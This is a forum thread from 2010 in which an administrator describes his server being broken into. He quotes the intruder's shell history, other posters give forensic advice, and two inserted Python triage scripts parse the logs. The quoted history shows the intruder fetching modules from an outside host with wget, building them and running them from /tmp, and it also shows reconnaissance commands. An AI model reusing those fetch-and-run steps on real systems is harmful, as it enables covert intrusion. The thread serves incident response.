Anybody hacked my PC?

Posted: Fri Sep 10, 2010 10:20 am
by Darkness
Hi,

I need help about this topic. Hope anybody can tell me something!

I noticed this morning that my root password had changed. After recovering it, I saw a new user on my server called "c". This is what I found in the bash_history of that user:
cd /tmp
wget http://www.unrealircd.com/downloads/Unr ... 8.1.tar.gz
tar -zxvf Unreal3.2.8.1.tar.gz
ls
rm -fr Unreal3.2.8.1.tar.gz
cd Unreal3.2
./Config
make
cd src/modules
wget http://unknown.me.uk/hideserver.c
wget http://unknown.me.uk/hideserver.so
cd ..
cd ..
make custommodule MODULEFILE=hideserver
wget http://unknown.me.uk/ircd.motd
wget http://unknown.me.uk/antirandom.tar.gz
tar zxvf antirandom.tar.gz
pwd
cd AntiRandom-1.1
./build
cd ..
./unreal start
exit
Does anyone know what this is?

I found nothing in the bash_history of the root user. I suppose he deleted it.


Thanks!!!
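A small triage script for a recovered bash_history, added here as an example and not code from this thread or from the UnrealIRCd project. It follows the attacker's directory changes the way a shell would, so that builds and executables are judged by where they ran (a staging directory such as /tmp) rather than only by name, tags downloads and recon commands, and collects every host a file was fetched from as a list of indicators. The sample history is a constructed copy of the one in the post above; the tarball name in the first URL is cut off in the post, so a labelled placeholder stands in for it. Command lists and staging directories are this example's own assumptions.

```python
"""Triage a recovered .bash_history for signs of a staged intrusion.

Added example for this thread; not code from the forum or from UnrealIRCd.
Tracks the working directory like a shell, flags downloads, builds and
executables run from staging directories, and collects download hosts.
"""
import posixpath
import re
from urllib.parse import urlparse

# Assumed command sets; extend them for your own environment.
DOWNLOADERS = {"wget", "curl", "fetch", "ftp", "tftp", "scp"}
BUILD_CMDS = {"make", "gcc", "cc", "./Config", "./configure", "./build"}
RECON_CMDS = {"w", "who", "last", "lastlog", "id", "uname", "ps", "netstat"}
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
URL_RE = re.compile(r"(?:https?|ftp)://\S+")

# Constructed sample: the history shown in the first post, with the
# truncated tarball name replaced by a placeholder.
SAMPLE_HISTORY = """\
cd /tmp
wget http://www.unrealircd.com/downloads/PLACEHOLDER-truncated-in-post.tar.gz
tar -zxvf Unreal3.2.8.1.tar.gz
ls
rm -fr Unreal3.2.8.1.tar.gz
cd Unreal3.2
./Config
make
cd src/modules
wget http://unknown.me.uk/hideserver.c
wget http://unknown.me.uk/hideserver.so
cd ..
cd ..
make custommodule MODULEFILE=hideserver
wget http://unknown.me.uk/ircd.motd
wget http://unknown.me.uk/antirandom.tar.gz
tar zxvf antirandom.tar.gz
pwd
cd AntiRandom-1.1
./build
cd ..
./unreal start
exit
"""


def in_staging(cwd):
    """True when cwd is inside one of the world-writable staging directories."""
    return any(cwd == d or cwd.startswith(d + "/") for d in STAGING_DIRS)


def triage_history(text, home="/home/c"):
    """Return (findings, hosts).

    findings: list of (line_no, tag, line) for every line worth a look.
    hosts: sorted hostnames that appeared in download URLs (IoC list).
    """
    cwd = home
    findings, hosts = [], set()
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        argv = line.split()
        cmd = argv[0]
        if cmd == "cd":
            # Follow directory changes so later commands can be judged by
            # where they ran, not just by their name.
            target = argv[1] if len(argv) > 1 else home
            cwd = posixpath.normpath(
                target if target.startswith("/") else posixpath.join(cwd, target))
            if in_staging(cwd):
                findings.append((line_no, "staging-dir", line))
        elif cmd in DOWNLOADERS:
            for url in URL_RE.findall(line):
                host = urlparse(url).hostname
                if host:
                    hosts.add(host)
            findings.append((line_no, "download", line))
        elif cmd in BUILD_CMDS and in_staging(cwd):
            findings.append((line_no, "build-in-staging", line))
        elif cmd.startswith("./") and in_staging(cwd):
            findings.append((line_no, "exec-from-staging", line))
        elif cmd in RECON_CMDS:
            findings.append((line_no, "recon", line))
    return findings, sorted(hosts)


if __name__ == "__main__":
    found, ioc_hosts = triage_history(SAMPLE_HISTORY)
    for line_no, tag, line in found:
        print(f"{line_no:3d} {tag:18s} {line}")
    print("download hosts (IoCs):", ", ".join(ioc_hosts))
```

Run on the sample it tags the wget lines as downloads, the ./Config, make, make custommodule and ./build lines as builds inside /tmp, and ./unreal start as an executable launched from there; the two download hosts come out as the list to block and search for elsewhere on the network.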

Re: Anybody hacked my PC?

Posted: Fri Sep 10, 2010 1:18 pm
by katsklaw
Sounds hacked to me.

You can do "last c" as root and see when and from what IP they connected. Please bear in mind that if you were hacked, the hacker would be stupid if he didn't bounce to your box, and the IP is most likely not his/her real one, but you'll have an idea of when it happened.

Re: Anybody hacked my PC?

Posted: Fri Sep 10, 2010 2:01 pm
by Darkness
No doubt. It was hacked.

He reconnected about one hour ago, this is what he tried:
w
lastlog
suid
id
uname 0a
uname -a
lastlog
cd /tmp
ls
cd .,
ls -a
exit
I had deleted his changes in /tmp before, so he exited. I have just changed the password of "c".

Now I have to try to recover the system status and delete the rootkits that he installed to get the password (I need help for that). I posted this in another forum (Spanish): http://www.espaciolinux.com/foros/post2 ... ml#p238645 . I will translate it here later.

Ahp, his IP:
c pts/0 173-203-192-173. Fri Sep 10 15:26 - 15:27 (00:00)


Thanks a lot!!
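katsklaw's "last c" suggestion and the wtmp line quoted above are worth turning into something repeatable, so here is a parser for "last" output, added as an example and not code from this thread. It pulls each session into a record, reproduces what "last c" shows for one user, and lists remote hosts that are not on an allowlist. The first sample line is the one from the post; the rest are constructed to cover a local login, a session still open, the reboot pseudo-user and the "wtmp begins" footer. The 16-character host column is an assumption about the classic "last" layout; "173-203-192-173." is exactly that long, so the script marks it as truncated, and the full hostname has to come from "last -a" or the raw wtmp rather than from this line.

```python
"""Parse `last` output into records and pull out one user's sessions.

Added example for this thread, not code from the forum.  Hostnames in the
classic `last` column are cut to HOST_COL characters (assumed 16), so a
host that fills the column is flagged as possibly truncated.
"""
import re

LAST_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>.*?)\s*"
    r"(?P<start>(?:Mon|Tue|Wed|Thu|Fri|Sat|Sun) \w{3}\s+\d{1,2} \d{2}:\d{2})\s+"
    r"(?:-\s+(?P<end>\d{2}:\d{2}|crash|down|gone - no logout)"
    r"|(?P<still>still logged in))"
    r"(?:\s+\((?P<dur>[^)]*)\))?"
)
HOST_COL = 16  # assumed width of the host column in classic `last` output

# Constructed sample: first line is the one quoted in the post, the others
# are invented to exercise the remaining layouts `last` prints.
SAMPLE_LAST = """\
c        pts/0        173-203-192-173. Fri Sep 10 15:26 - 15:27  (00:00)
c        pts/1        173-203-192-173. Fri Sep 10 10:02 - 10:09  (00:07)
root     pts/0        admin-ws.lan     Fri Sep 10 09:55   still logged in
darkness tty1                          Thu Sep  9 22:10 - 22:40  (00:30)
reboot   system boot  2.6.32-generic   Thu Sep  9 22:05 - 15:40  (17:35)

wtmp begins Wed Sep  1 00:00:01 2010
"""


def parse_last(text):
    """Turn `last` output into a list of dicts, skipping reboot entries,
    blank lines and the trailing 'wtmp begins' footer."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(("reboot ", "wtmp begins")):
            continue
        m = LAST_RE.match(line)
        if not m:
            continue  # unknown layout; keep going rather than stop mid-triage
        host = m.group("host")
        records.append({
            "user": m.group("user"),
            "tty": m.group("tty"),
            "host": host,
            "start": m.group("start"),
            "end": m.group("end") or ("still logged in" if m.group("still") else None),
            "duration": m.group("dur"),
            "remote": bool(host),
            # A host that fills the whole column was probably cut off.
            "host_truncated": len(host) >= HOST_COL,
        })
    return records


def logins_for(records, user):
    """Equivalent of `last <user>`: only that user's sessions, in print order."""
    return [r for r in records if r["user"] == user]


def unknown_remote_hosts(records, known_hosts):
    """Remote hosts that are not on the admin's own allowlist."""
    return sorted({r["host"] for r in records
                   if r["remote"] and r["host"] not in known_hosts})


if __name__ == "__main__":
    recs = parse_last(SAMPLE_LAST)
    for r in logins_for(recs, "c"):
        flag = " (host truncated, use last -a)" if r["host_truncated"] else ""
        print(f'{r["user"]} {r["tty"]} from {r["host"]} at {r["start"]} '
              f'until {r["end"]}{flag}')
    print("hosts not on allowlist:", unknown_remote_hosts(recs, {"admin-ws.lan"}))
```

The allowlist is the set of addresses the admin actually logs in from; anything else that reached a shell is a session to line up against the bash_history timestamps and the other tools' logs.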

Re: Anybody hacked my PC?

Posted: Fri Sep 10, 2010 3:34 pm
by katsklaw
I suggest rootkit hunter found at http://www.rootkit.nl/